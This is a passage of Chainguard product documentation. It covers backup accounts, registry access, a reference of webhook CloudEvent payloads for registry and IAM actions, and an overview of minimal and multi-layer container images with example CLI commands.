Backup accounts In the case of an outage or misconfiguration of your identity provider, it can be helpful to have an authentication mechanism to the Chainguard platform outside of your SSO identity provider for recovery purposes. To this end, you can use one of our OIDC login providers (currently Google, GitHub, or GitLab) to create a backup account. As an OIDC login account needs to be set up to bootstrap the SSO identity provider initially, it's possible to keep this account as a backup account in case you need it for recovery. However, the nature of these OIDC provider accounts is such that it is difficult to share them as a backup resource since they're often tied to a single user. Instead of relying on an account with an OIDC login provider, you can alternatively set up an assumable identity to use as a backup account. Refer to our conceptual guide on assumable identities to learn more. --- ### Registry Overview URL: https://edu.chainguard.dev/chainguard/chainguard-registry/overview/ Last Modified: April 11, 2025 Tags: Chainguard Containers, Registry, Product Chainguard's registry provides public access to all public Chainguard Containers, and provides customer access for image variants through login and authentication. While all public Chainguard Containers are freely available, logging in with a Chainguard account and authenticating when pulling from the registry provides a mechanism for Chainguard to contact you if there are any current or known upcoming issues with images you are pulling.
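As a quick illustration of what authenticated pulls look like in practice, the following commands sketch one way to log in and configure Docker credentials before pulling. This assumes you have chainctl installed, and the organization path and image name are placeholders for your own:

chainctl auth login
chainctl auth configure-docker
docker pull cgr.dev/<your organization>/<image-name>:latest

The configure-docker step sets up a Docker credential helper so that subsequent docker pull commands against cgr.dev use your Chainguard credentials automatically.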
If you would like to learn more about Chainguard Containers, you can review our documentation, and you can request further information through our inquiry form. Status You can check the status of Chainguard's registry at https://status.cgr.dev. Network Requirements Refer to our Network Requirements reference page for details about how to ensure access to Chainguard's registry in environments using firewalls, access control lists, and proxies. Using a Caching Proxy with Chainguard's registry Chainguard does not offer an uptime SLA for Chainguard's registry. In order to minimize production dependency on Chainguard's registry, we recommend that customers use a pull-through proxy for maximum reliability. We currently provide documentation on how you can set up a pull-through cache for Chainguard's registry on the following platforms:
- Google Artifact Registry
- JFrog Artifactory
- Sonatype Nexus
- Cloudsmith

--- ### Chainguard Events URL: https://edu.chainguard.dev/chainguard/administration/cloudevents/events-reference/ Last Modified: June 30, 2025 Tags: Platform, Reference, Product Chainguard generates and emits CloudEvents based on actions that occur within a Chainguard account, such as registering a Kubernetes cluster or creating an IAM invitation. Chainguard also emits events when workloads or policies are changed in a cluster. Check out this GitHub repository for some sample applications that demonstrate how to use events to create Slack notifications, open GitHub issues, and mirror images. To subscribe to Chainguard events for your account, use the chainctl command like this: chainctl events subscriptions create --parent $YOUR_ORGANIZATION_OR_FOLDER https://<Your webhook URL> Once you are subscribed to Chainguard events, you will start receiving HTTP POST requests. Each request has a common set of CloudEvent header fields, denoted by the Ce- prefix. The event body is encoded using JSON and will have two top-level keys, actor and body. The actor field is the identity of the actor in your Chainguard account that triggered the event, such as a team member or a Kubernetes cluster. The body field contains the specific data about the event, for example the response status for an invite creation request, or a cluster delete request. UIDP Identifiers Each Chainguard event includes a Ce-Subject header that contains a UIDP (UID Path) identifier. Identifiers follow POSIX directory semantics and components are separated by / delimiters. A UIDP is composed of:
- A globally unique identifier (UID) consisting of 20 bytes that are URL-safe hex encoded. For example, account identities like 0475f6baca584a8964a6bce6b74dbe78dd8805b6.
- One or more /-separated scoped unique identifiers (SUIDs). An SUID is 8 bytes that are unique within a scope (like a group), and are URL-safe hex encoded. The following is an example SUID: b74ce966caf448d1.

SUIDs are used to identify every entity in Chainguard, from groups, policies, Kubernetes cluster IDs, event subscriptions, to IAM invitations, roles and role-bindings. Since Chainguard groups can contain child groups, events in a child group will propagate to the parent and thus the UIDP will contain multiple group SUIDs, along with the entity SUID itself.
For example, assuming the following components: An account UID of 0475f6baca584a8964a6bce6b74dbe78dd8805b6 A group SUID of b74ce966caf448d1 A child of group b74ce966caf448d1 with its own SUID of dda9aab2d2d90f9e The complete UIDP in the event’s Ce-Subject header would be: 0475f6baca584a8964a6bce6b74dbe78dd8805b6/b74ce966caf448d1/dda9aab2d2d90f9e/1a4b29ca6df80013 Authorization Header Every Chainguard event has a JWT formatted OIDC ID token in its Authorization header. For authorization purposes, there are two important fields to validate: Use the iss field to ensure that the issuer is Chainguard, specifically https://issuer.enforce.dev. Use the sub field to check that the event matches your configured Chainguard identity. For example, assuming a UIDP ID of 0475f6baca584a8964a6bce6b74dbe78dd8805b6, the value will resemble the following: webhook:0475f6baca584a8964a6bce6b74dbe78dd8805b6. If the subscription is in a sub-group, then the value will have the corresponding group SUID appended to the path. Validating these fields before processing the JWT token using a verification library can save resources, as well as alert about suspicious traffic, or misconfigured Chainguard group settings. Events Reference The following list of services and methods show example HTTP headers and bodies for public facing Chainguard events. Service: Registry - Pull Method: Pulled Example HTTP Headers POST / HTTP/1.1 Host: console-api.enforce.dev Accept-Encoding: gzip Authorization: Bearer oidctoken Ce-Audience: customer Ce-Group: UID of parent group Ce-Id: cloudevent generated UUID Ce-Source: cgr.dev Ce-Specversion: 1.0 Ce-Subject: The identifier of the repository being pulled from Ce-Time: 2025-06-30T21:38:01.77840281Z Ce-Type: dev.chainguard.registry.pull.v1 Content-Length: 777 Content-Type: application/json User-Agent: Chainguard Enforce Example HTTP Body { "actor": { "subject": "identity that triggered the event" }, "body": { "digest": "The digest of the image being pulled", "error": { "code": "The OCI distribution-spec error code", "message": "The error message", "status": 0 }, "location": "Location holds the detected approximate location of the client who pulled. For example, \"ColumbusOHUS\" or \"Minato City13JP", "method": "The method used to pull the image. One of: HEAD or GET", "remote_address": "", "repo_id": "The identifier of the repository being pulled from", "repository": "The identifier of the repository being pulled from", "tag": "The tag of the image being pulled", "type": "Type determines whether the object being pulled is a manifest or blob", "user_agent": "The user-agent of the client who pulled", "when": "2025-06-30T21:38:01.777462" } } Service: Registry - Push Method: Pushed Example HTTP Headers POST / HTTP/1.1 Host: console-api.enforce.dev Accept-Encoding: gzip Authorization: Bearer oidctoken Ce-Audience: customer Ce-Group: UID of parent group Ce-Id: cloudevent generated UUID Ce-Source: cgr.dev Ce-Specversion: 1.0 Ce-Subject: The identifier of the repository being pushed to Ce-Time: 2025-06-30T21:38:01.777663437Z Ce-Type: dev.chainguard.registry.push.v1 Content-Length: 707 Content-Type: application/json User-Agent: Chainguard Enforce Example HTTP Body { "actor": { "subject": "identity that triggered the event" }, "body": { "digest": "The digest of the image being pushed", "error": { "code": "The OCI distribution-spec error code", "message": "The error message", "status": 0 }, "location": "Location holds the detected approximate location of the client who pushed. 
For example, \"ColumbusOHUS\" or \"Minato City13JP", "remote_address": "", "repo_id": "The identifier of the repository being pushed to", "repository": "The identifier of the repository being pushed to", "tag": "The tag of the image being pushed", "type": "Type determines whether the object being pushed is a manifest or blob", "user_agent": "The user-agent of the client who pushed", "when": "2025-06-30T21:38:01.777441" } } Service: auth - Auth Method: Register Example HTTP Headers POST / HTTP/1.1 Host: console-api.enforce.dev Accept-Encoding: gzip Authorization: Bearer oidctoken Ce-Audience: customer Ce-Group: UID of parent group Ce-Id: cloudevent generated UUID Ce-Source: https://console-api.enforce.dev/auth/v1/register Ce-Specversion: 1.0 Ce-Subject: Chainguard UIDP Ce-Time: 2025-06-30T21:38:01.780370153Z Ce-Type: dev.chainguard.api.auth.registered.v1 Content-Length: 154 Content-Type: application/json User-Agent: Chainguard Enforce Example HTTP Body { "actor": { "subject": "identity that triggered the event" }, "body": { "group": "the group this identity has joined by invitation", "identity": "Chainguard UIDP" } } Service: events - Subscriptions Method: Create Example HTTP Headers POST / HTTP/1.1 Host: console-api.enforce.dev Accept-Encoding: gzip Authorization: Bearer oidctoken Ce-Audience: customer Ce-Group: UID of parent group Ce-Id: cloudevent generated UUID Ce-Source: https://console-api.enforce.dev/events/v1/subscriptions Ce-Specversion: 1.0 Ce-Subject: UIDP identifier of the subscription Ce-Time: 2025-06-30T21:38:01.787603771Z Ce-Type: dev.chainguard.api.events.subscription.created.v1 Content-Length: 152 Content-Type: application/json User-Agent: Chainguard Enforce Example HTTP Body { "actor": { "subject": "identity that triggered the event" }, "body": { "id": "UIDP identifier of the subscription", "sink": "Webhook endpoint (http/https URL)" } } Method: Delete Example HTTP Headers POST / HTTP/1.1 Host: console-api.enforce.dev Accept-Encoding: gzip Authorization: Bearer oidctoken Ce-Audience: customer Ce-Group: UID of parent group Ce-Id: cloudevent generated UUID Ce-Source: https://console-api.enforce.dev/events/v1/subscriptions Ce-Specversion: 1.0 Ce-Subject: UIDP identifier of the subscription to delete Ce-Time: 2025-06-30T21:38:01.787780142Z Ce-Type: dev.chainguard.api.events.subscription.deleted.v1 Content-Length: 119 Content-Type: application/json User-Agent: Chainguard Enforce Example HTTP Body { "actor": { "subject": "identity that triggered the event" }, "body": { "id": "UIDP identifier of the subscription to delete" } } Service: iam - GroupAccountAssociations Method: Create Example HTTP Headers POST / HTTP/1.1 Host: console-api.enforce.dev Accept-Encoding: gzip Authorization: Bearer oidctoken Ce-Audience: customer Ce-Group: UID of parent group Ce-Id: cloudevent generated UUID Ce-Source: https://console-api.enforce.dev/iam/v1/account_associations Ce-Specversion: 1.0 Ce-Subject: UIDP with which this account information is associated Ce-Time: 2025-06-30T21:38:01.786173995Z Ce-Type: dev.chainguard.api.iam.account_associations.created.v1 Content-Length: 385 Content-Type: application/json User-Agent: Chainguard Enforce Example HTTP Body { "actor": { "subject": "identity that triggered the event" }, "body": { "amazon": { "account": "Amazon account ID (if applicable)" }, "description": "description of this association", "google": { "project_id": "Google Cloud Project ID (if applicable)", "project_number": "Google Cloud Project Number (if applicable)" }, "group": "UIDP with which 
this account information is associated", "name": "group name" } } Method: Update Example HTTP Headers POST / HTTP/1.1 Host: console-api.enforce.dev Accept-Encoding: gzip Authorization: Bearer oidctoken Ce-Audience: customer Ce-Group: UID of parent group Ce-Id: cloudevent generated UUID Ce-Source: https://console-api.enforce.dev/iam/v1/account_associations Ce-Specversion: 1.0 Ce-Subject: UIDP with which this account information is associated Ce-Time: 2025-06-30T21:38:01.786453669Z Ce-Type: dev.chainguard.api.iam.account_associations.updated.v1 Content-Length: 336 Content-Type: application/json User-Agent: Chainguard Enforce Example HTTP Body { "actor": { "subject": "identity that triggered the event" }, "body": { "amazon": { "account": "amazon account if applicable" }, "description": "group description", "google": { "project_id": "project id if applicable", "project_number": "project number if applicable" }, "group": "UIDP with which this account information is associated", "name": "group name" } } Method: Delete Example HTTP Headers POST / HTTP/1.1 Host: console-api.enforce.dev Accept-Encoding: gzip Authorization: Bearer oidctoken Ce-Audience: customer Ce-Group: UID of parent group Ce-Id: cloudevent generated UUID Ce-Source: https://console-api.enforce.dev/iam/v1/account_associations Ce-Specversion: 1.0 Ce-Subject: UIDP of the group whose associations will be deleted Ce-Time: 2025-06-30T21:38:01.786680273Z Ce-Type: dev.chainguard.api.iam.account_associations.deleted.v1 Content-Length: 129 Content-Type: application/json User-Agent: Chainguard Enforce Example HTTP Body { "actor": { "subject": "identity that triggered the event" }, "body": { "group": "UIDP of the group whose associations will be deleted" } } Service: iam - GroupInvites Method: Create Example HTTP Headers POST / HTTP/1.1 Host: console-api.enforce.dev Accept-Encoding: gzip Authorization: Bearer oidctoken Ce-Audience: customer Ce-Group: UID of parent group Ce-Id: cloudevent generated UUID Ce-Source: https://console-api.enforce.dev/iam/v1/group_invites Ce-Specversion: 1.0 Ce-Subject: group UIDP under which this invite resides Ce-Time: 2025-06-30T21:38:01.780932696Z Ce-Type: dev.chainguard.api.iam.group_invite.created.v1 Content-Length: 145 Content-Type: application/json User-Agent: Chainguard Enforce Example HTTP Body { "actor": { "subject": "identity that triggered the event" }, "body": { "expiration": { "seconds": 100 }, "id": "group UIDP under which this invite resides" } } Method: Delete Example HTTP Headers POST / HTTP/1.1 Host: console-api.enforce.dev Accept-Encoding: gzip Authorization: Bearer oidctoken Ce-Audience: customer Ce-Group: UID of parent group Ce-Id: cloudevent generated UUID Ce-Source: https://console-api.enforce.dev/iam/v1/group_invites Ce-Specversion: 1.0 Ce-Subject: UIDP of the record Ce-Time: 2025-06-30T21:38:01.782156506Z Ce-Type: dev.chainguard.api.iam.group_invite.deleted.v1 Content-Length: 92 Content-Type: application/json User-Agent: Chainguard Enforce Example HTTP Body { "actor": { "subject": "identity that triggered the event" }, "body": { "id": "UIDP of the record" } } Service: iam - Groups Method: Create Example HTTP Headers POST / HTTP/1.1 Host: console-api.enforce.dev Accept-Encoding: gzip Authorization: Bearer oidctoken Ce-Audience: customer Ce-Group: UID of parent group Ce-Id: cloudevent generated UUID Ce-Source: https://console-api.enforce.dev/iam/v1/groups Ce-Specversion: 1.0 Ce-Subject: group UIDP under which this group resides Ce-Time: 2025-06-30T21:38:01.779213057Z Ce-Type: 
dev.chainguard.api.iam.group.created.v1 Content-Length: 169 Content-Type: application/json User-Agent: Chainguard Enforce Example HTTP Body { "actor": { "subject": "identity that triggered the event" }, "body": { "description": "group description", "id": "group UIDP under which this group resides", "name": "group name" } } Method: Update Example HTTP Headers POST / HTTP/1.1 Host: console-api.enforce.dev Accept-Encoding: gzip Authorization: Bearer oidctoken Ce-Audience: customer Ce-Group: UID of parent group Ce-Id: cloudevent generated UUID Ce-Source: https://console-api.enforce.dev/iam/v1/groups Ce-Specversion: 1.0 Ce-Subject: group UIDP under which this group resides Ce-Time: 2025-06-30T21:38:01.779424994Z Ce-Type: dev.chainguard.api.iam.group.updated.v1 Content-Length: 169 Content-Type: application/json User-Agent: Chainguard Enforce Example HTTP Body { "actor": { "subject": "identity that triggered the event" }, "body": { "description": "group description", "id": "group UIDP under which this group resides", "name": "group name" } } Method: Delete Example HTTP Headers POST / HTTP/1.1 Host: console-api.enforce.dev Accept-Encoding: gzip Authorization: Bearer oidctoken Ce-Audience: customer Ce-Group: UID of parent group Ce-Id: cloudevent generated UUID Ce-Source: https://console-api.enforce.dev/iam/v1/groups Ce-Specversion: 1.0 Ce-Subject: UIDP of the record Ce-Time: 2025-06-30T21:38:01.779578481Z Ce-Type: dev.chainguard.api.iam.group.deleted.v1 Content-Length: 92 Content-Type: application/json User-Agent: Chainguard Enforce Example HTTP Body { "actor": { "subject": "identity that triggered the event" }, "body": { "id": "UIDP of the record" } } Service: iam - Identities Method: Create Example HTTP Headers POST / HTTP/1.1 Host: console-api.enforce.dev Accept-Encoding: gzip Authorization: Bearer oidctoken Ce-Audience: customer Ce-Group: UID of parent group Ce-Id: cloudevent generated UUID Ce-Source: https://console-api.enforce.dev/iam/v1/identities Ce-Specversion: 1.0 Ce-Subject: UIDP of identity Ce-Time: 2025-06-30T21:38:01.782561264Z Ce-Type: dev.chainguard.api.iam.identity.created.v1 Content-Length: 329 Content-Type: application/json User-Agent: Chainguard Enforce Example HTTP Body { "actor": { "subject": "identity that triggered the event" }, "body": { "identity": { "Relationship": null, "description": "The human readable description of identity", "id": "The unique identifier of this specific identity", "name": "The human readable name of identity" }, "parent_id": "The Group UIDP path under which the new Identity resides" } } Method: Update Example HTTP Headers POST / HTTP/1.1 Host: console-api.enforce.dev Accept-Encoding: gzip Authorization: Bearer oidctoken Ce-Audience: customer Ce-Group: UID of parent group Ce-Id: cloudevent generated UUID Ce-Source: https://console-api.enforce.dev/iam/v1/identities Ce-Specversion: 1.0 Ce-Subject: The unique identifier of this specific identity Ce-Time: 2025-06-30T21:38:01.782828193Z Ce-Type: dev.chainguard.api.iam.identity.updated.v1 Content-Length: 245 Content-Type: application/json User-Agent: Chainguard Enforce Example HTTP Body { "actor": { "subject": "identity that triggered the event" }, "body": { "Relationship": null, "description": "The human readable description of identity", "id": "The unique identifier of this specific identity", "name": "The human readable name of identity" } } Method: Delete Example HTTP Headers POST / HTTP/1.1 Host: console-api.enforce.dev Accept-Encoding: gzip Authorization: Bearer oidctoken Ce-Audience: customer 
Ce-Group: UID of parent group Ce-Id: cloudevent generated UUID Ce-Source: https://console-api.enforce.dev/iam/v1/identities Ce-Specversion: 1.0 Ce-Subject: UIDP of the record Ce-Time: 2025-06-30T21:38:01.783068303Z Ce-Type: dev.chainguard.api.iam.identity.deleted.v1 Content-Length: 92 Content-Type: application/json User-Agent: Chainguard Enforce Example HTTP Body { "actor": { "subject": "identity that triggered the event" }, "body": { "id": "UIDP of the record" } } Service: iam - IdentityProviders Method: Create Example HTTP Headers POST / HTTP/1.1 Host: console-api.enforce.dev Accept-Encoding: gzip Authorization: Bearer oidctoken Ce-Audience: customer Ce-Group: UID of parent group Ce-Id: cloudevent generated UUID Ce-Source: https://console-api.enforce.dev/iam/v1/identityProviders Ce-Specversion: 1.0 Ce-Subject: UIDP of identity provider Ce-Time: 2025-06-30T21:38:01.779759309Z Ce-Type: dev.chainguard.api.iam.identity_providers.created.v1 Content-Length: 378 Content-Type: application/json User-Agent: Chainguard Enforce Example HTTP Body { "actor": { "subject": "identity that triggered the event" }, "body": { "identity_provider": { "Configuration": null, "description": "The human readable description of identity provider", "id": "The UIDP of the IAM group to nest this identity provider under", "name": "The human readable name of identity provider" }, "parent_id": "The UIDP of the IAM group to nest this identity provider under" } } Method: Update Example HTTP Headers POST / HTTP/1.1 Host: console-api.enforce.dev Accept-Encoding: gzip Authorization: Bearer oidctoken Ce-Audience: customer Ce-Group: UID of parent group Ce-Id: cloudevent generated UUID Ce-Source: https://console-api.enforce.dev/iam/v1/identityProviders Ce-Specversion: 1.0 Ce-Subject: The UIDP of the IAM group to nest this identity provider under Ce-Time: 2025-06-30T21:38:01.779944686Z Ce-Type: dev.chainguard.api.iam.identity_providers.updated.v1 Content-Length: 279 Content-Type: application/json User-Agent: Chainguard Enforce Example HTTP Body { "actor": { "subject": "identity that triggered the event" }, "body": { "Configuration": null, "description": "The human readable description of identity provider", "id": "The UIDP of the IAM group to nest this identity provider under", "name": "The human readable name of identity provider" } } Method: Delete Example HTTP Headers POST / HTTP/1.1 Host: console-api.enforce.dev Accept-Encoding: gzip Authorization: Bearer oidctoken Ce-Audience: customer Ce-Group: UID of parent group Ce-Id: cloudevent generated UUID Ce-Source: https://console-api.enforce.dev/iam/v1/identityProviders Ce-Specversion: 1.0 Ce-Subject: UIDP of the IdP Ce-Time: 2025-06-30T21:38:01.780117169Z Ce-Type: dev.chainguard.api.iam.identity_providers.deleted.v1 Content-Length: 89 Content-Type: application/json User-Agent: Chainguard Enforce Example HTTP Body { "actor": { "subject": "identity that triggered the event" }, "body": { "id": "UIDP of the IdP" } } Service: iam - RoleBindings Method: Create Example HTTP Headers POST / HTTP/1.1 Host: console-api.enforce.dev Accept-Encoding: gzip Authorization: Bearer oidctoken Ce-Audience: customer Ce-Group: UID of parent group Ce-Id: cloudevent generated UUID Ce-Source: https://console-api.enforce.dev/iam/v1/rolebindings Ce-Specversion: 1.0 Ce-Subject: UIDP of the Role to bind Ce-Time: 2025-06-30T21:38:01.786949717Z Ce-Type: dev.chainguard.api.iam.rolebindings.created.v1 Content-Length: 261 Content-Type: application/json User-Agent: Chainguard Enforce Example HTTP Body { "actor": { 
"subject": "identity that triggered the event" }, "body": { "parent": "The Group UIDP path under which the new RoleBinding resides", "role_binding": { "id": "UID of this role binding", "identity": "UID of the Identity to bind", "role": "UIDP of the Role to bind" } } } Method: Update Example HTTP Headers POST / HTTP/1.1 Host: console-api.enforce.dev Accept-Encoding: gzip Authorization: Bearer oidctoken Ce-Audience: customer Ce-Group: UID of parent group Ce-Id: cloudevent generated UUID Ce-Source: https://console-api.enforce.dev/iam/v1/rolebindings Ce-Specversion: 1.0 Ce-Subject: UID of this role binding Ce-Time: 2025-06-30T21:38:01.787137549Z Ce-Type: dev.chainguard.api.iam.rolebindings.updated.v1 Content-Length: 173 Content-Type: application/json User-Agent: Chainguard Enforce Example HTTP Body { "actor": { "subject": "identity that triggered the event" }, "body": { "id": "UID of this role binding", "identity": "UID of the Identity to bind", "role": "UIDP of the Role to bind" } } Method: Delete Example HTTP Headers POST / HTTP/1.1 Host: console-api.enforce.dev Accept-Encoding: gzip Authorization: Bearer oidctoken Ce-Audience: customer Ce-Group: UID of parent group Ce-Id: cloudevent generated UUID Ce-Source: https://console-api.enforce.dev/iam/v1/rolebindings Ce-Specversion: 1.0 Ce-Subject: UID of the record Ce-Time: 2025-06-30T21:38:01.787330219Z Ce-Type: dev.chainguard.api.iam.rolebindings.deleted.v1 Content-Length: 91 Content-Type: application/json User-Agent: Chainguard Enforce Example HTTP Body { "actor": { "subject": "identity that triggered the event" }, "body": { "id": "UID of the record" } } Service: registry - Registry Method: CreateRepo Example HTTP Headers POST / HTTP/1.1 Host: console-api.enforce.dev Accept-Encoding: gzip Authorization: Bearer oidctoken Ce-Audience: customer Ce-Group: UID of parent group Ce-Id: cloudevent generated UUID Ce-Source: https://console-api.enforce.dev/registry/v1/repos Ce-Specversion: 1.0 Ce-Subject: The identifier of this specific repository Ce-Time: 2025-06-30T21:38:01.783539004Z Ce-Type: dev.chainguard.api.platform.registry.repo.created.v1 Content-Length: 243 Content-Type: application/json User-Agent: Chainguard Enforce Example HTTP Body { "actor": { "subject": "identity that triggered the event" }, "body": { "id": "The identifier of this specific repository", "name": "The name is the human-readable name of the repository", "sync_config": { "expiration": {}, "source": "Repo ID to sync from" } } } Method: UpdateRepo Example HTTP Headers POST / HTTP/1.1 Host: console-api.enforce.dev Accept-Encoding: gzip Authorization: Bearer oidctoken Ce-Audience: customer Ce-Group: UID of parent group Ce-Id: cloudevent generated UUID Ce-Source: https://console-api.enforce.dev/registry/v1/repos Ce-Specversion: 1.0 Ce-Subject: The identifier of this specific repository Ce-Time: 2025-06-30T21:38:01.78388445Z Ce-Type: dev.chainguard.api.platform.registry.repo.updated.v1 Content-Length: 243 Content-Type: application/json User-Agent: Chainguard Enforce Example HTTP Body { "actor": { "subject": "identity that triggered the event" }, "body": { "id": "The identifier of this specific repository", "name": "The name is the human-readable name of the repository", "sync_config": { "expiration": {}, "source": "Repo ID to sync from" } } } Method: DeleteRepo Example HTTP Headers POST / HTTP/1.1 Host: console-api.enforce.dev Accept-Encoding: gzip Authorization: Bearer oidctoken Ce-Audience: customer Ce-Group: UID of parent group Ce-Id: cloudevent generated UUID Ce-Source: 
https://console-api.enforce.dev/registry/v1/repos Ce-Specversion: 1.0 Ce-Subject: The identifier of this specific repository Ce-Time: 2025-06-30T21:38:01.784116194Z Ce-Type: dev.chainguard.api.platform.registry.repo.deleted.v1 Content-Length: 116 Content-Type: application/json User-Agent: Chainguard Enforce Example HTTP Body { "actor": { "subject": "identity that triggered the event" }, "body": { "id": "The identifier of this specific repository" } } Method: CreateTag Example HTTP Headers POST / HTTP/1.1 Host: console-api.enforce.dev Accept-Encoding: gzip Authorization: Bearer oidctoken Ce-Audience: customer Ce-Group: UID of parent group Ce-Id: cloudevent generated UUID Ce-Source: https://console-api.enforce.dev/registry/v1/tags Ce-Specversion: 1.0 Ce-Subject: The identifier of this specific tag Ce-Time: 2025-06-30T21:38:01.785252862Z Ce-Type: dev.chainguard.api.platform.registry.tag.created.v1 Content-Length: 197 Content-Type: application/json User-Agent: Chainguard Enforce Example HTTP Body { "actor": { "subject": "identity that triggered the event" }, "body": { "digest": "The digest of the manifest with this tag", "id": "The identifier of this specific tag", "name": "The unique name of the tag" } } Method: UpdateTag Example HTTP Headers POST / HTTP/1.1 Host: console-api.enforce.dev Accept-Encoding: gzip Authorization: Bearer oidctoken Ce-Audience: customer Ce-Group: UID of parent group Ce-Id: cloudevent generated UUID Ce-Source: https://console-api.enforce.dev/registry/v1/tags Ce-Specversion: 1.0 Ce-Subject: The identifier of this specific tag Ce-Time: 2025-06-30T21:38:01.785576657Z Ce-Type: dev.chainguard.api.platform.registry.tag.updated.v1 Content-Length: 197 Content-Type: application/json User-Agent: Chainguard Enforce Example HTTP Body { "actor": { "subject": "identity that triggered the event" }, "body": { "digest": "The digest of the manifest with this tag", "id": "The identifier of this specific tag", "name": "The unique name of the tag" } } Method: DeleteTag Example HTTP Headers POST / HTTP/1.1 Host: console-api.enforce.dev Accept-Encoding: gzip Authorization: Bearer oidctoken Ce-Audience: customer Ce-Group: UID of parent group Ce-Id: cloudevent generated UUID Ce-Source: https://console-api.enforce.dev/registry/v1/tags Ce-Specversion: 1.0 Ce-Subject: The identifier of this specific tag Ce-Time: 2025-06-30T21:38:01.785806818Z Ce-Type: dev.chainguard.api.platform.registry.tag.deleted.v1 Content-Length: 109 Content-Type: application/json User-Agent: Chainguard Enforce Example HTTP Body { "actor": { "subject": "identity that triggered the event" }, "body": { "id": "The identifier of this specific tag" } } --- ### Overview of Chainguard Containers URL: https://edu.chainguard.dev/chainguard/chainguard-images/overview/ Last Modified: May 27, 2025 Tags: Chainguard Containers, Product Chainguard Containers are a collection of container images designed for security and minimalism. Many Chainguard Containers are distroless; they contain only an open-source application and its runtime dependencies. These images do not even contain a shell or package manager, and are often paired with an equivalent development variant (sometimes referred to as a dev variant) that allows further customization, for build and debug purposes. Chainguard Containers are built with Chainguard OS, designed from the ground up to produce container images that meet the requirements of a secure software supply chain. 
The main features of Chainguard Containers include:
- Minimal design, with no unnecessary software bloat
- Automated nightly builds to ensure container images are completely up-to-date and contain all available security patches
- High quality build-time SBOMs (software bills of materials) attesting the provenance of all artifacts within the container image
- Verifiable signatures provided by Sigstore
- Reproducible builds with Cosign and apko (read more about reproducibility)

Chainguard Containers are primarily available from Chainguard's registry, but a selection of developer images is also available on Docker Hub. You can find the complete list of available Chainguard Containers in our public Containers Directory or within the Chainguard Console. Why Minimal Container Images The fewer dependencies a given piece of software uses, the lower the likelihood that it will be impacted by CVEs. By minimizing the number of dependencies and thus reducing their potential attack surface, Chainguard Containers inherently contain few to zero CVEs. Chainguard Containers are rebuilt nightly to ensure they are completely up-to-date and contain all available security patches. With this nightly build approach, our engineering team sometimes fixes vulnerabilities before they're detected. Note that there is often a development variant of each Chainguard Container available. These are sometimes called the -dev variant, as their tags include the -dev suffix (as in :latest-dev). For example, the development variant of the mariadb:latest container image is mariadb:latest-dev. These container images typically contain a shell and tools like a package manager to allow users to more easily debug and modify the image. Why Multi-Layer Container Images Chainguard originally took a single-layer approach to container images built with apko in order to offer simplicity and clarity. However, in an effort to deliver better stability, security, and efficiency for larger and more complex applications, Chainguard introduced multi-layer container images in May 2025. This approach leverages container runtime caching so that a layer used by multiple images does not need to be downloaded more than once, and you don't need to download the whole image each time there is an update on one layer. Chainguard's approach to layering is a "per-origin" strategy, where packages that derive from the same upstream source are grouped in the same layer because they tend to receive updates together. We observed that this approach achieved the following:
- A ~70% reduction in the total size of unique layer data across our image catalog compared to the single-layer approach
- A 70-85% reduction in the cumulative bytes transferred when simulating sequential pulls of updated images like PyTorch and NeMo

To maximize the stability and reusability of our layers, Chainguard identified, analyzed, and implemented three additional technical changes:
- Added an additional final layer that captures frequently updated OS-level metadata
- Developed intelligent layer ordering to optimize compatibility
- Ensured sufficient layer counts to optimize parallel downloads by container clients

The primary benefit of this layered approach is that when one package changes it impacts only its particular layer, requiring only that layer to be downloaded again. Because the other layers don't need to be downloaded again, Chainguard's multi-layer container images support greater efficiency and developer velocity.
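If you'd like to see this layering for yourself, one way is to pull an image and count its filesystem layers locally. This is a minimal sketch; the python image is just an example, and the exact layer count will vary by image and tag:

docker pull cgr.dev/chainguard/python:latest
docker inspect --format '{{len .RootFS.Layers}}' cgr.dev/chainguard/python:latest

The second command prints the number of layers in the locally pulled image, which you can compare across tags to see how much of an image actually changes between updates.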
Production and Starter Containers Chainguard offers a collection of container images that are publicly available and don’t require authentication, being free to use by anyone. We refer to these images as Starter containers, and they cover several use cases for different language ecosystems. Starter images are limited to the latest build of a given image, tagged as latest and latest-dev. Production containers are enterprise-ready images that come with patch SLAs and features such as Federal Information Processing Standard (FIPS) readiness and unique time stamped tags. Unlike Starter containers, which are typically paired with only the latest version of an upstream package, Production containers offer specific major and minor versions of open source software. You can access our container images directly from Chainguard’s registry. Chainguard’s registry provides public access to all public Chainguard Containers, and provides customer access for Production Containers after logging in and authenticating. For a complete list of Starter containers that are currently available, check our Containers Directory. Registered users can also access all Starter and Production containers in the Chainguard Console. After logging in you will be able to find all the current Starter containers in the Public containers tab. If you’ve selected an appropriate Organization in the drop-down menu above the left hand navigation, you can find your organization’s Production containers in the Organization images tab. Comparing Container Images The following graph shows a comparison between the official Nginx image and Chainguard’s Nginx container image, based on the number of CVEs (common vulnerabilities and exposures) detected by Grype: Nginx Comparing the latest official Nginx image with cgr.dev/chainguard/nginx The major advantage of distroless images is the reduced size and complexity, which results in a vastly reduced attack surface. This is evidenced by the results from security scanners, which detect far fewer potential vulnerabilities in Chainguard Containers. You can review more comparisons of Chainguard Containers and external images by checking out our Vulnerability Comparisons dashboard. chainctl, Chainguard’s command line interface tool, comes with a useful diff feature that also allows you to compare two Chainguard Containers. Architecture By default, all Wolfi-based images are built for x86_64 (also known as AMD64) and AArch64 (also known as ARM64) architectures. Being able to provide multi-platform Chainguard Containers enables the support of more than one runtime environment, like those available on all three major clouds, AWS, GCP, and Azure. The macOS M1 and M2 chips are also based on ARM architecture. Chainguard Containers allow you to take advantage of ARM’s power consumption and cost benefits. You can confirm the available architecture of a given Chainguard Container with Crane. In this example, we’ll use the latest Ruby image, but you can opt to use an alternate image. crane manifest cgr.dev/chainguard/ruby:latest |jq -r '.manifests []| .platform' Once you run this command, you’ll receive output similar to the following. { "architecture": "amd64", "os": "linux" } { "architecture": "arm64", "os": "linux" } This verifies that the Ruby Chainguard Container is built for both AMD64 and ARM64 architectures. You can read more about our support of ARM64 in our blog on Building Wolfi from the ground up. 
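Another way to confirm which architecture you've pulled, assuming you have Docker available, is to inspect the image locally. This sketch reuses the Ruby example from above; the platform and image name are illustrative:

docker pull --platform=linux/arm64 cgr.dev/chainguard/ruby:latest
docker inspect --format '{{.Os}}/{{.Architecture}}' cgr.dev/chainguard/ruby:latest

The output should read linux/arm64, matching the platform you requested in the pull.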
